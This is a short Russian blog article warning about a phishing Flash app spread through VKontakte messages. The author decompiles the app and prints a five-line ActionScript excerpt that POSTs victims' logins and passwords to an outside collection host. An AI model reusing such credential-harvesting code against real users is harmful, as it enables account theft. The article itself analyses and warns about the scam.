Категории раздела
Веб програмирование [3]
Железо [2]
Защита компьютеров и ПО [9]
Новое меню

Для красивого отображения этого блока требуется Flash Player 10 или выше.А так же у вас должен быть включен JAVA-script.

Друзья сайта
Государственная Дума Федерального Собрания Российской Федерации
Форум для нас! Лучший форум для общения!
Бесплатный софт!
Пожертвования
Поддержи проект
Пожертвуй на развитие:

ВебМани:
R426310533025
E284667347734
Z228705258191
Yandex.Деньги:
41001235067835
А так же с помощью SMS: SMS.копилка
Контакты

CTACOH 411-O43-OOO
Главная » Статьи » Защита компьютеров и ПО

На vkontakte снова тырят пароли нерадивых пользователей
Сегодня мне пришло сообщение от одного из друзей, текст его гласил:


Пpивeтик, Дeниc. Смoтpи кaкoй чaт вкoнтaктe — vkontakte.ru/apps.php?act=s&id=236634&.... Зaxoди cкopее, мне oчень понpaвилcя! Кyча впечатлений, бывает пеpеполнен-недоcтупен)))


Сообщение ушло бы в треш, но последнее предложение насторожило – просто так такое не пишут.

Решил посмотреть, что за фрукт...

Перешел по ссылке, увидел обычное флешевое приложение, выглядело оно так:







После ввода любых данных форма выбрасывает сообщение, что чат перегружен.

Естественно, стало интересно какие телодвижение при этом оно выполняет,
для этого я скачал сам swf-файлик и скормил его Swf Decompiler'у. После
разделки оказалось, что пассы и мыла летят POST’ом на http://ckrack.peoplego.ru/save.php:



  1. var my_lv = new LoadVars();
  2. var result_lv = new LoadVars();
  3. my_lv.login_v = _root.login_txt.text;
  4. my_lv.password_v = _root.password_txt.text;
  5. my_lv.sendAndLoad(«ckrack.peoplego.ru/save.php», result_lv, «POST»);


Нерадивый программер, писавший эту флешку даже не потрудился вставить
туда проверку валидности email-адреса. Видимо, был занят написанием
малвари, которая в этот самый «чат» людей зазывает.



P.S.: Пароли воровали, воруют и будут воровать, но удивляет только одно: неужели людей считают настолько тупыми глупыми, делая такие жалкие попытки красть пароли?

Автор статьи : Helios

Ссылка на источник : ТУТ
Категория: Защита компьютеров и ПО | Добавил: CTACOH (12.04.2009)
Просмотров: 1447 | Комментарии: 1 | Теги: vkontakte, пароль, Социальные сети, пароль, vkontakte | Рейтинг: 0.0/0 |
Всего комментариев: 1
1 alex_ivanoff  
0
"P.S.: Пароли воровали, воруют и будут воровать, но удивляет только одно: неужели людей считают настолько тупыми глупыми, делая такие жалкие попытки красть пароли?"
Я скажу по другому: "Пароли воровали, воруют и будут воровать, но удивляет только одно: неужели не закончатся тупые люди, которые даже на эти жалкие попытки украсть пароли клюют!"
Пароли будут воровать, потому что люди не знают банальных мер предосторожностей в сети. Теперь уже злоумышленники не пытаются подобрать пароль к странице - хозяин страницы им сам пароль присылает... wacko

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Среда, 23.07.2025, 10:37
Приветствую Вас Гость
Это ТЫ
Привет: Гость

Сообщения:

Гость, мы рады вас видеть. Пожалуйста зарегистрируйтесь или авторизуйтесь!
Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Посетившие за день:
Последнее на Форуме.
Тема: PC GAMING PC BAKU(0)
Автор: masterpcbaku
Дата: 14.09.2020 22:13
Тема: Ремонт, сборка компьютеров и ноутбуков в БАКУ(0)
Автор: masterpcbaku
Дата: 12.09.2020 13:08
Тема: Срочный Ремонт Компьютеров с Выездом, Баку, Baku (2021)(0)
Автор: masterpcbaku
Дата: 12.09.2020 13:07
Тема: Компьютерный Мастер На Дому в Баку. Азербайджан(0)
Автор: masterpcbaku
Дата: 12.09.2020 13:05
Тема: Ремонт Ноутбуков в Баку Ремонт Компьютеров ПК(0)
Автор: masterpcbaku
Дата: 12.09.2020 13:04
Последние комментарии.
Где: HtmlReader (мне нужна хорошоя видио инструкция для изучения HtmlReader 2.5
заранее бл)

Автор: владимир
Дата: 17.04.2013 20:07
Где: Восстановление MBR с помощью BOOTICE и лечение от MBR вымогателей. (Приветствую! Очень рад видеть, что ссылочку на сайт поставили. Я обратил внимани)
Автор: Leoss57.ru
Дата: 06.12.2012 08:37
Где: Восстановление MBR с помощью BOOTICE и лечение от MBR вымогателей. (Благодарствую, что не забыли поставить ссылочку на мой ресурс.)
Автор: Leoss57
Дата: 02.06.2012 20:32